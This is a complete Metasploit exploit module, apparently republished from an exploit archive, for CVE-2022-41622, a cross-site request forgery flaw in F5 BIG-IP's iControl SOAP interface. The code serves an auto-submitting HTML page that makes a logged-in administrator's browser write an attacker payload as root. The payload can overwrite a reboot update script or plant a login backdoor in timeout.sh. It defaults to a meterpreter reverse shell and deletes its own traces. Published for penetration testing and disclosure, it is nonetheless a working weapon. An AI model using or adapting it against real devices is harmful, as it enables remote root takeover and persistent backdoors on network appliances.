F5 BIG-IP iControl Cross Site Request Forgery

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpServer::HTML  
include Msf::Exploit::FileDropper  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'F5 BIG-IP iControl CSRF File Write SOAP API',  
'Description' => %q{  
This module exploits a cross-site request forgery (CSRF) vulnerability  
in F5 Big-IP's iControl interface to write an arbitrary file to the  
filesystem.  
  
While any file can be written to any location as root, the  
exploitability is limited by SELinux; the vast majority of writable  
locations are unavailable. By default, we write to a script that  
executes at reboot, which means the payload will execute the next time  
the server boots.  
  
An alternate target - Login - will add a backdoor that executes next  
time a user logs in interactively. This overwrites a file,  
but we restore it when we get a session  
  
Note that because this is a CSRF vulnerability, it starts a web  
server, but an authenticated administrator must visit the site, which  
redirects them to the target.  
},  
'Author' => [  
'Ron Bowes' # Discovery, PoC, and module  
],  
'References' => [  
['CVE', '2022-41622'],  
['URL', 'https://github.com/rbowes-r7/refreshing-soap-exploit'],  
['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],  
['URL', 'https://support.f5.com/csp/article/K97843387'],  
['URL', 'https://support.f5.com/csp/article/K94221585'],  
['URL', 'https://support.f5.com/csp/article/K05403841'],  
],  
'License' => MSF_LICENSE,  
'DisclosureDate' => '2022-11-16', # Vendor advisory  
'Platform' => ['unix', 'linux'],  
'Arch' => [ARCH_CMD],  
'Type' => :unix_cmd,  
'Privileged' => true,  
'Targets' => [  
[ 'Restart', {}, ],  
[ 'Login', {}, ],  
[ 'Custom', {}, ]  
],  
'DefaultTarget' => 0,  
'DefaultOptions' => {  
'RPORT' => 443,  
'SSL' => true,  
'Payload' => 'cmd/unix/python/meterpreter/reverse_tcp'  
},  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [  
IOC_IN_LOGS,  
ARTIFACTS_ON_DISK  
]  
}  
)  
)  
  
register_options(  
[  
OptString.new('TARGET_HOST', [true, 'The IP or domain name of the target F5 device']),  
OptString.new('TARGET_URI', [true, 'The URI of the SOAP API', '/iControl/iControlPortal.cgi']),  
OptBool.new('TARGET_SSL', [true, 'Use SSL for the upstream connection?', true]),  
OptString.new('FILENAME', [false, 'The file on the target to overwrite (for "custom" target) - note that SELinux prevents overwriting a great deal of useful files']),  
]  
)  
end  
  
def on_request_uri(socket, _request)  
if datastore['TARGET'] == 0 # restart  
filename = '/shared/f5_update_action'  
file_payload = <<~EOT  
UpdateAction  
https://localhost/success`#{payload.encoded}`  
https://localhost/error  
0  
0  
0  
0  
EOT  
  
# Delete the logfile if we get a session  
register_file_for_cleanup('/var/log/f5_update_checker.out')  
  
print_status("Redirecting the admin to overwrite #{filename}; if successful, your session will come approximately 2 minutes after the target is rebooted")  
elsif datastore['TARGET'] == 1 # login  
filename = '/var/run/config/timeout.sh'  
file_payload = "#{payload.encoded} & disown;"  
  
# Delete the backdoored file if we get a session.. this will be fixed at  
# next reboot  
register_file_for_cleanup('/var/run/config/timeout.sh')  
  
print_status("Redirecting the admin to overwrite #{filename}; if successful, your session will come the next time a user logs in interactively")  
else # Custom  
  
filename = datastore['FILENAME']  
file_payload = payload.encoded  
  
print_status("Redirecting the admin to overwrite #{filename} with the payload")  
end  
  
# Build the SOAP request that'll be sent to the target server  
csrf_payload = %(  
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:con="urn:iControl:System/ConfigSync">  
<soapenv:Header/>  
<soapenv:Body>  
<con:upload_file soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">  
<file_name xsi:type="xsd:string">#{filename}</file_name>  
<file_context xsi:type="urn:System.ConfigSync.FileTransferContext" xmlns:urn="urn:iControl">  
<!--type: Common.OctetSequence-->  
<file_data xsi:type="urn:Common.OctetSequence">#{Rex::Text.encode_base64(file_payload)}</file_data>  
<chain_type xsi:type="urn:Common.FileChainType">FILE_FIRST_AND_LAST</chain_type>  
</file_context>  
</con:upload_file>  
</soapenv:Body>  
</soapenv:Envelope>  
)  
  
# Build the target URL  
target_url = "#{datastore['TARGET_SSL'] ? 'https' : 'http'}://#{datastore['TARGET_HOST']}#{datastore['TARGET_URI']}"  
  
# Build the HTML payload that'll send the SOAP request via the user's browser  
html_payload = %(  
<html>  
<body>  
<form action="#{target_url}" method="POST" enctype="text/plain">  
<textarea id="payload" name="<!--">-->#{Rex::Text.html_encode(csrf_payload)}</textarea>  
</form>  
<script>  
document.forms[0].submit();  
</script>  
</body>  
</html>  
)  
  
# Send the HTML to the browser  
send_response(socket, html_payload, { 'Content-Type' => 'text/html' })  
end  
  
def exploit  
# Sanity check  
if datastore['TARGET'] == 2 && (!datastore['FILENAME'] || datastore['FILENAME'].empty?)  
fail_with(Failure::BadConfig, 'For custom targets, please provide the FILENAME')  
end  
  
print_good('Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below')  
super  
end  
end  
`